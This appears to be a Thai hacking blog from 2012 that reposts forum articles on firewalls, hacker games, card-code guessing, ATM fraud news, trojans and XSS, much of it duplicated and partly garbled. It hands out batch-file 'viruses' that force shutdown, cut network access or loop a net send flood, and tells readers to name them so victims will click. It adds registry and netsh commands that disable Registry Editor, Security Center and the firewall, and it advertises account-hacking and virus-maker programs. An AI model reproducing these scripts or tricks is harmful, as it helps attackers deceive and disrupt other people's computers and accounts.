ลองค้นแล้วหาไม่เจอคิดว่าถ้าใคเข้ามาในเวบนี้ควรต้องรู้ไว้
ความรู้พื้นฐานเกี่ยวกับ Firewall
Firewall คืออะไร
Firewall นั้นหากจะแปลตรงตัวจะแปลว่ากำแพงไฟ แต่ที่จริงแล้ว firewall นั้นเป็นกำแพงที่มีไว้เพื่อป้องกันไฟโดยที่ตัวมันเองนั้นไม่ใช่ไฟตามดังคำ แปล firewall ในสิ่งปลูกสร้างต่างๆนั้นจะทำด้วยอิฐเพื่อแยกส่วนต่างๆของสิ่งปลูกสร้างออก จากกันเพื
่อที่ว่าในเวลาไฟไหม้ไฟจะได้ไม่ลามไปทั่วสิ่งปลูกสร้างนั้นๆ หรือ Firewall ในรถยนต์ก็จะเป็นแผ่นโลหะใช้แยกส่วนของเครื่องยนต์และส่วนของที่นั่งของผู้ โดยสารออก
จากกัน
ในเครือข่าย Internet นั้น firewall อาจถูกใช้สำหรับป้องกันไม่ให้ "ไฟ" จากเครือข่าย Internet ภายนอกลามเข้ามาภายในเครือข่าย LAN ส่วนตัวของท่านได้ หรืออาจถูกใช้เพื่อป้องกันไม่ให้ผู้ใช้ใน LAN ของท่านออกไปโดน "ไฟ" ในเครือข่าย Internet ภายนอกได้
ตามคำจำกัดความแล้ว firewall หมายความถึง ระบบหนึ่งหรือกลุ่มของระบบที่บังคับใช้นโยบายการควบคุมการเข้าถึงของระหว่างเครือข่า
ยสอง เครือข่าย โดยที่วิธีการกระทำนั้นก็จะแตกต่างกันไปแล้วแต่ระบบ แต่โดยหลักการแล้วเราสามารถมอง firewall ได้ว่าประกอบด้วยกลไกสองส่วนโดยส่วนแรกมีหน้าที่ในการกั้น traffic และส่วนที่สองมีหน้าที่ในการปล่อย traffic ให้ผ่านไปได้
วันพฤหัสบดีที่ 12 เมษายน พ.ศ. 2555
แนะนำเกมส์ฝึก Hack ที่มีความสมจริงที่สุดครับ [ชาว Ruk-Com ไม่ควรพลาด]
Hack Me If You Can ?
สวัสดีครับวันนี้จะมาแนะนำเว็บเกี่ยวกับสอน ทักษะการเป็น Hacker อย่างดีเลยครับ (game) นะครับ
เว็บ
http://www.hackerskill.net << ชื่อเว็บก็น่าตื่นเต้นแล้ว
ในเว็บมีอะไรบ้าง เดี๋ยวจะพาไปชมครับ
ขั้นตอนการเล่นเกมส์
1 สมัครสมาชิกก่อนเลยครับ
เสร็จแล้ว มองหาตามภาพครับ
ด่านต่างๆ มีทั้ง basic และั ภารกิจเสมือนจริงครับ
สำหรับผู้ที่เพิ่งจะเริ่มต้นไม่มีความรู้มากนักทางเว็บได้จัดทำที่ไว้ให้แชร์ความรู้กัน สอบถาม กันได้ตามสบายครับ
ข้อมูลจาก ruk-com.in.th
สวัสดีครับวันนี้จะมาแนะนำเว็บเกี่ยวกับสอน ทักษะการเป็น Hacker อย่างดีเลยครับ (game) นะครับ
เว็บ
http://www.hackerskill.net << ชื่อเว็บก็น่าตื่นเต้นแล้ว
ในเว็บมีอะไรบ้าง เดี๋ยวจะพาไปชมครับ
ขั้นตอนการเล่นเกมส์
1 สมัครสมาชิกก่อนเลยครับ
เสร็จแล้ว มองหาตามภาพครับ
ด่านต่างๆ มีทั้ง basic และั ภารกิจเสมือนจริงครับ
สำหรับผู้ที่เพิ่งจะเริ่มต้นไม่มีความรู้มากนักทางเว็บได้จัดทำที่ไว้ให้แชร์ความรู้กัน สอบถาม กันได้ตามสบายครับ
ข้อมูลจาก ruk-com.in.th
แจก โค้ดไวรัส Autorun งายๆแต่โครตอันตราย
ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
==============================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
==============================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
วันอังคารที่ 10 เมษายน พ.ศ. 2555
ที่สุดของ Hacker ที่ Hacker ไฝ่ฝันไขว้ขว้ามันมา
เรื่องนี้อาจเป็นเรื่องสุดท้ายของผม ก่อนไปผมอยากเห็น พวกคุณ ขอบคุณ ผมจริงๆจังๆสักที ขอคุณครับ :-\ :-\
- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง DWORD Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default) Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus
- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย
- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com
ข้อมูลจาก ruk-com.in.th
- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง DWORD Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default) Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
@echo off
net stop "Security Center"
netsh firewall set opmaode mode=disable
4.รุ้ข้อมูลเครื่องเหยื่อ net stop "Security Center"
netsh firewall set opmaode mode=disable
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus
- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย
- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com
ข้อมูลจาก ruk-com.in.th
เจาะระบบ Net work ฉบับสมบูรณ์ (หากซ้ำขออภัย)
ถ้าคุณอยากจะ Hack เว็บซักเว็บนึง
การ hack แบบเนี้ยรู้สึกว่าเค้าจะเรียกกันว่า hack webapp ซึ่งง่ายและเข้าใจได้ไว สำหรับผู้เริ่มต้น hack แบบนี้ เราจะได้มาซึ่ง shell ไอ้เจ้า shell นี้ ถ้าให้อธิบายคนไม่รู้เรื่องเอาเลยได้ฟัง คงจะเปรียบกับเรา บุกเข้าไปถึง drive ต่างๆ ของเครื่อง server เช่น c: d: e: แล้วเราสามารถที่จะ สั่ง ให้เครื่องนั้น ทำอะไรก็ได้ ด้วย shell command ต่างๆ เช่น จะ dir ดู file จะ format จะขโมยสคริป จะ dump database จะ ฯลฯ ตามแต่จินตนาการ เท่าที่ command ต่างๆ จะทำได้
เริ่มเข้าเรื่องดีกว่า
ขั้นแรก ขั้นหา ip
ก่อนจะ hack เราก็ต้องหาว่าเครื่องเจ้ากรรมเนี้ย ตั้งอยู่ที่ไหน การที่เราจะดูว่าเวปนี้ตั้งอยู่ในคอมเครื่องไหน ใช้คอมเครื่องไหนเป็น server หรือไปเช่า host ใครอยู่ ไม่ว่าจะใครจะเรียกยังไง ผมเรียกว่าเครื่องนั้นคือเครื่อง server แล้วกัน สิ่งที่จะบ่งชี้ว่าเครื่องใครเป็นเครื่องใครก็คือ IP ทีนี้การจะได้มาซึ่ง IP ของเจ้าคอมเครื่องที่มีเวปที่เราอยากจะ hack ตั้งอยู่ ก็มีหลายวิธี แบบง่ายเราก็ เข้าหน้า จอ dos แล้วก็ ping ชื่อเวป เราก็จะได้ ip แระ หรือ เราจะใช้ addons ของ firefox ก็ได้ (ลองหาเอง มีเยอะแยะ) หรือจะเข้า google หาเวปประเภทบริการ whois ให้ก็ได้
เราสามารถ hack บัตรเติมเงินโทรศัพท์ ได้หรือไม่
บังเอิญได้อ่านบทความนี้มาจาก Net พบว่า เป็นโจทย์ที่น่าคิดมาก เพราะผมก็ใช้บัตรเติมเงินอยู่ เป็นของ dtac
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร
เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ
แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป
สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร
เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ
แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป
สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก
วันอาทิตย์ที่ 8 เมษายน พ.ศ. 2555
อัจฉริยะ จบแค่ ป.4 Hack ระบบ ATM ธนาคาร โอนเงินเข้ามือถือ
แกะรอยรวบโจรไฮเทค จบแค่ ป.4 แต่ใช้อินเตอร์เน็ทบนมือถือเจาะระบบเอทีเอ็ม ยักเงินเติมยอดในซิมการ์ดมือถือ เจ้าของบัญชีงงตาแตกถูกตอดเงินเป็นระยะสูญเป็นแสน แถมผู้เสียหายมีอีกหลายราย ตร.ออกหาข่าวอยู่นาน กระทั่งพบคนร้ายนำซิมการ์ดหลายร้อยใบมาขายที่ ?ไนท์พลาซ่า? เปิดเกมส์แกะรอย พบพิรุธเงินไหลผ่านมือถือผิดสังเกต แถมเปิดโต๊ะเติมเงินมือถือที่บ้านเกิด-ลูกค้าเพียบ บุกค้นบ้านพบหลักฐานมัด เจ้าตัวรับทำมา 4 ปีแต่ไม่รวย ด้านผู้ประกอบการเตือนอย่าหลงเชื่อเติมเงินราคาถูก
เมื่อวันที่ 9 ก.พ. พ.ต.อ.นริศ ละม้ายอินทร์ ผกก.สภ.อ.วิเศษชัยชาญ จ.อ่างทอง ได้รับการประสานขอกำลังจากพ.ต.ท.ธนะรัตน์ ชุมสวัสดิ์ รอง ผกก.สส.ศสส.ภ.5 เมื่อกลางดึกคืนวันที่ 8 ก.พ. เพื่อนำหมายศาลจังหวัดอ่างทองที่ 29/2549 เข้าตรวจค้นและจับกุมนายชัยยศ ฉัตรอมรวิเศษ อายุ 36 ปี อยู่บ้านเลขที่ 526 หมู่ 6 ต.ศาลเจ้าโรงทอง อ.วิเศษชัยชาญ ผู้ต้องหาก่อคดีลักทรัพย์โดยใช้โทรศัพท์มือถือเจาะรหัสข้อมูลโอนเงินจากตู้ เอทีเอ็มธนาคารเป็นค่าเติมเงินโทรศัพท์ เหตุเกิดที่ สภ.อ.แม่ปิง จ.เชียง ใหม่ และอีกหลายท้องที่ ตั้งแต่ปี 2545-2549 ต่อเนื่องกัน
จากการตรวจค้นพบซิมการ์ดโทรศัพท์มือถือทุกระบบของบริษัท เอไอเอส ดีแทค ออเร้นจ์ ที่มีอยู่นับร้อยใบ สมุดบันทึกโทรศัพท์มือถือของลูกค้า รหัสผ่านตู้เอทีเอ็มของธนาคารต่าง ๆ หลายร้อยรหัส บัตรเติมเงินที่ใช้แล้ว ภาพโป๊ และเกมที่ดาวน์โหลดมาจากอินเทอร์เน็ตผ่านโทรศัพท์มือถือ ที่ไรต์ลงแผ่นซีดีเพื่อจำหน่าย ทั้งนี้ภายหลังการจับกุมเจ้าหน้าที่ศสส.ภ.5 ได้ลงบันทึกประจำวันเป็นหลักฐาน ก่อนควบคุมตัวไปสอบสวนและขยายผลที่ จ.เชียงใหม่ทันที
Hotmail,yahoo,gmail,Facebook,hi5,webonline[โปรแกรมมาแล้ว]
ขอมานะครับ วันนี้ไม่ทัน เด๋วพรุ่ง นี้เอาให้มี ให้เล่นอีกเย๊อะ
ขอความกรุณา อย่าเอา User กับ Pass ที่อยู่ในภาพไป แก้ไขหรือเปลี่ยน รหัสและอย่าทำให้เขาได้รับความเสียหายนะ ครับ
เราศึกษา เพื่อแก้ไข ไม่ใช่ทำลายนะครับ พรบ คอมพิวเตอร์ ปี 54 จะออกแล้ว แรงนะ ครับ
กดขอตรงนี้=> คลิก!! http://adf.ly/2ITjI
ชื่อบนภาพ เป็นนามแฟงผมเอง
พรุ่งนี้มี 2 ตัวมาแจก นะครับ รออ
1. โปรแกรม hack mail
2. โปรแกรมสร้างไวรัส สำเร็จรูป
อันนี้ลองได้ ไม่รับประกัน โดนมาแล้ว เล่าให้ฟังสักนิดก็ได้ ผมทำไว้เล่น ๆ ใส่ แฟรชไดร์ ไว้ บังเอิญ เพื่อน ยืมไปสอนหนังสือ นศ ลืมบอกว่าเป็นไวรัส ทำไว้ซะสวยงามเลยเป็น ไอคอนรูป เกมส์
คอม 45 เครื่อง ลง วินโดว์ใหม่หมด 555+
ข้อมูลจาก ruk-com.in.th
อยากรู้ไหมทำไม โนเกีย 1100 มือถือจอขาวดำจึงมีราคาพุ่งสูงถึงเครื่องละแสนบาท!
แต่เป็นจำเลยใหญ่ไปแล้วกับ “โนเกีย 1100″ มือ ถือจอขาวดำสุดคลาสสิก ฟีเจอร์สุดเบบี้ มีไฟฉายติดมาด้วย ถึงแม้จะตกรุ่นไปนานแล้ว แต่กำลังเป็นที่ต้องการอย่างมาก (อีกครั้ง) ในขณะนี้
อย่างไรก็ดี ด้วยความที่มันไม่มีลูกเล่นอะไรที่พิศดารเลยนี่เอง ประกอบกับราคาสุดถูงในบรรดามือถือแบรนด์โนเกียทั้งหมด จึงทำให้ “โนเกีย 1100″ มือถือที่เปิดตัวเมื่อ 6 ปีที่แล้วด้วยราคาหลัก 1000 บาทต้นๆ ในไทย กลายเป็นมือถือที่ขายไปทั่วโลก ขายไปแล้วกว่า 200 ล้านเครื่อง!!! และวันนี้มันก็มลายหายไปจากตลาดเป็นที่เรียบร้อย
แต่หารู้ไม่ว่า วันนี้ “โนเกีย 1100″ มีค่าหลักแสนบาท! ไม่ใช่เพราะผู้ออกแบบเสียชีวิตลง แต่เป็นเพราะมันคืออาวุธชิ้นสำคัญ ที่แฮคเกอร์จะคว้าเงินล้านลงกระเป๋าตัวเองได้ แต่สิ่งที่สำคัญมากๆ ก็คือ “โนเกีย 1100″ เครื่องนั้นจะต้องผลิตจากเมือง Bochum เยอรมัน เท่านั้น
อยากรู้ว่าทำไมจึงเป็นเช่นนั้น และพวกแฮคเกอร์จะใช้มือถือทรงแท่งหน้าตาเชยๆ นั้นทำอะไร เชิญกวาดตาไปบรรทัดต่อไปทันที!
วิธีการคือ เหล่าแฮคเกอร์จะนำมือถือรุ่นนี้ ผลิตจากที่เยอรมันนี่ มารันโปรแกรมลงไปใหม่ เพื่อให้มันสามารถใช้เบอร์เดียวกับมือถือเครื่องอื่นได้ นั่นก็หมายความว่า ข้อความ SMS ใดๆ ที่เบอร์มือถือต้นฉบับได้ มือถือโนเกีย 1100 เครื่องที่ก๊อปปี้มาก็จะได้รับเช่นเดียวกัน
สอนวิธีการ hack wireless ใช้แบบฟรีๆเลยครับ [หากซ้ำก้อขออภัย]
วันเสาร์ที่ 7 เมษายน พ.ศ. 2555
ม้าโทรจัน(ของคอมพิวเตอร์)
ม้าโทรจัน (Trojan horse)
หมายถึง โปรแกรมคอมพิวเตอร์ที่ถูกบรรจุเข้าไปในคอมพิวเตอร์ เพื่อลอบเก็บข้อมูลของคอมพิวเตอร์เครื่องนั้น เช่น ข้อมูลชื่อผู้ใช้ รหัส
ผ่าน เลขที่บัญชีธนาคาร หมายเลขบัตรเครดิต และข้อมูลส่วนบุคคลอื่น ๆ โดยส่วนใหญ่แฮกเกอร์จะส่งโปรแกรมเข้าไปในคอมพิวเตอร์เพื่อดัก
จับ ข้อมูลดังกล่าว แล้วนำไปใช้ในการเจาะระบบ และเพื่อโจมตีคอมพิวเตอร์, เซิร์ฟเวอร์, หรือระบบเครือข่ายอีกที ซึ่งเป็นที่รู้จักกันในชื่อการ
โจมตีเพื่อ "ปฏิเสธการให้บริการ" (Denial of Services)โปรแกรมม้าโทรจัน ถือเป็นโปรแกรมที่สอดคล้องกับการทำงานของคอมพิวเตอร์
ไม่มีคำสั่งหรือการปฏิบัติการที่เป็นอันตรายต่อตัวคอมพิวเตอร์ จึงไม่ถือว่าเป็นไวรัสคอมพิวเตอร์
------------------------------------------------------------------------------------------
ม้าโทรจันในคอมพิวเตอร์ทํางานอย่างไร
อย่างที่กล่าวแล้วว่า ม้าโทรจันแตกต่างจากไวรัสที่การทํางาน ไวรัสทํางานโดย ทําลายคอมพิวเตอร์ ทั้งฮารดแวร์และซอฟตแวร์อย่างแท้จริง
ไวรัส บางตัวอย่าง Love BUG ทําลายไฟล์โดยการเปลี่ยนแปลงรายละเอียดในไฟล์ ไวรัส CIH ทําให้ไบออสของคอมพิวเตอร์เสีย และเข้าถึงข้อมูลในฮารดดิสกไม่ได้ แต่?ม้าโทรจัน? ไม่ทําอะไรกับคอมพิวเตอร์ ม้าโทรจันไม่มีคําสั่งหรือพฤติกรรมการทําลายคอมพิวเตอร์เหมือนไวรัส
ม้าโทรจันเหมือนโปรแกรมทั่วไปในคอมพิวเตอร์ สมัยก่อนเวลาพูดถึงม้าโทรจัน จะว่ากันว่าขนาดของไฟล์ แตกตางจากไวรัสที่ขนาดของม้าโทรจันนั้น เป็นโปรแกรมขนาดเล็ก และเป็นโปรแกรมที่ไม่ถือวามีพฤติกรรมเป็นอันตรายต่อคอมพิวเตอร์ ซึ่งในทางการกําจัดไวรัส จะมีการตรวจ
หมายถึง โปรแกรมคอมพิวเตอร์ที่ถูกบรรจุเข้าไปในคอมพิวเตอร์ เพื่อลอบเก็บข้อมูลของคอมพิวเตอร์เครื่องนั้น เช่น ข้อมูลชื่อผู้ใช้ รหัส
ผ่าน เลขที่บัญชีธนาคาร หมายเลขบัตรเครดิต และข้อมูลส่วนบุคคลอื่น ๆ โดยส่วนใหญ่แฮกเกอร์จะส่งโปรแกรมเข้าไปในคอมพิวเตอร์เพื่อดัก
จับ ข้อมูลดังกล่าว แล้วนำไปใช้ในการเจาะระบบ และเพื่อโจมตีคอมพิวเตอร์, เซิร์ฟเวอร์, หรือระบบเครือข่ายอีกที ซึ่งเป็นที่รู้จักกันในชื่อการ
โจมตีเพื่อ "ปฏิเสธการให้บริการ" (Denial of Services)โปรแกรมม้าโทรจัน ถือเป็นโปรแกรมที่สอดคล้องกับการทำงานของคอมพิวเตอร์
ไม่มีคำสั่งหรือการปฏิบัติการที่เป็นอันตรายต่อตัวคอมพิวเตอร์ จึงไม่ถือว่าเป็นไวรัสคอมพิวเตอร์
------------------------------------------------------------------------------------------
ม้าโทรจันในคอมพิวเตอร์ทํางานอย่างไร
อย่างที่กล่าวแล้วว่า ม้าโทรจันแตกต่างจากไวรัสที่การทํางาน ไวรัสทํางานโดย ทําลายคอมพิวเตอร์ ทั้งฮารดแวร์และซอฟตแวร์อย่างแท้จริง
ไวรัส บางตัวอย่าง Love BUG ทําลายไฟล์โดยการเปลี่ยนแปลงรายละเอียดในไฟล์ ไวรัส CIH ทําให้ไบออสของคอมพิวเตอร์เสีย และเข้าถึงข้อมูลในฮารดดิสกไม่ได้ แต่?ม้าโทรจัน? ไม่ทําอะไรกับคอมพิวเตอร์ ม้าโทรจันไม่มีคําสั่งหรือพฤติกรรมการทําลายคอมพิวเตอร์เหมือนไวรัส
ม้าโทรจันเหมือนโปรแกรมทั่วไปในคอมพิวเตอร์ สมัยก่อนเวลาพูดถึงม้าโทรจัน จะว่ากันว่าขนาดของไฟล์ แตกตางจากไวรัสที่ขนาดของม้าโทรจันนั้น เป็นโปรแกรมขนาดเล็ก และเป็นโปรแกรมที่ไม่ถือวามีพฤติกรรมเป็นอันตรายต่อคอมพิวเตอร์ ซึ่งในทางการกําจัดไวรัส จะมีการตรวจ
วันศุกร์ที่ 6 เมษายน พ.ศ. 2555
การโจมตี XSS ตอนที่ 1
การโจมตี XSS ตอนที่ 1
จากที่ทาง www.datasafehouse.net ซึ่งเป็นบริการเสริมสร้างความปลอดภัยให้กับเว็บไซต์ได้เปิดเผยสถิติเกี่ยว กับเว็บไซต์ในประเทศไทยที่มีความเสี่ยงต่อการโจมตีมีถึง 41 เว็บ (รายละเอียด) ส่วนใหญ่แล้วเป็นช่องโหว่เว็บที่เกิดจากเทคนิคที่เรียกว่า XSS
Cross-site scripting (XSS) คือช่องโหว่ในคอมพิวเตอร์ชนิดหนึ่งที่มักพบในเว็บแอพพลิเคชั่นซึ่งยอมให้
ผู้ใช้เว็บที่มีเจตนาร้ายสามารถส่งโค้ดคำสั่งเข้าไปในหน้าเว็บที่ผู้ใช้เว็บคนอื่น ๆ เปิดดู ตัวอย่างของโค้ดดังกล่าวได้แก่
โค้ด HTML และสคริปต์ฝั่งไคลเอ็นท์ ผู้โจมตีสามารถใช้ช่องโหว่ cross-site scripting เพื่อหลบหลีกมาตรการ
ควบคุมการเข้าถึง เช่น same origin policy เมื่อไม่นานมานี้ช่องโหว่ประเภทนี้ถูกใช้เพื่อสร้างการโจมตีฟิชชิ่งและช่อง
โหว่เบราว์เซอร์อันทรงพลัง แต่เดิม Cross-site script ใช้ตัวย่อว่า CSS อย่างไรก็ตามตัวย่อนี้ไม่เป็นที่นิยมอีกต่อไป
ความเป็นมาการโจมตี XSS
การตรวจสอบ Cross Site Scripting
ไม่ว่าข้อมูลใดๆก็ตามที่ได้รับจาก User ถือว่ามีความเสี่ยงในด้านของปลอดภัยทั้งนั้น เพราะเราไม่สามารถรู้วัตถประสงค์ที่แท้จริงของผู้ใช้งานระบบของเราว่าเค้าจะ ใส่ข้อมูลที่เราต้องการหรืออาจจะเป็นข้อมูลที่เราไม่พึ่งประสงค์เข้ามาใน ระบบ หนทางที่ดีที่สุดคือการใส่ระบบป้องกันให้ระบบของเรา หรือ การเขียน program ให้ปลอดภัยนั้นเอง
การโจมตีสามารถทำได้โดย การเขียน script ฝั่งลงไปกับข้อมูล (Cross site scripting attacks) หรือการหาช่ิองทางของคำสั่ง query ในฐานข้อมูลเพื่อดึงข้อมูลที่ต้องการออกมา (SQL injection attacks) สามารถทำได้หลากหลายรูปแบบ และเป็นสิ่งที่เราน่าจะเรียนรู้เพื่อนำไปสู่วิธี่การป้องกันที่ดี ลองคิดดูว่าการเขียนโปรแกรมของเรามีการจัดการเรื่องพวกนี้ได้ดีแค่ไหน หรือ ดีพอหรือยัง มาดูตัวอย่างการป้องกันที่เราคิดว่าน่าจะเพียงพอ
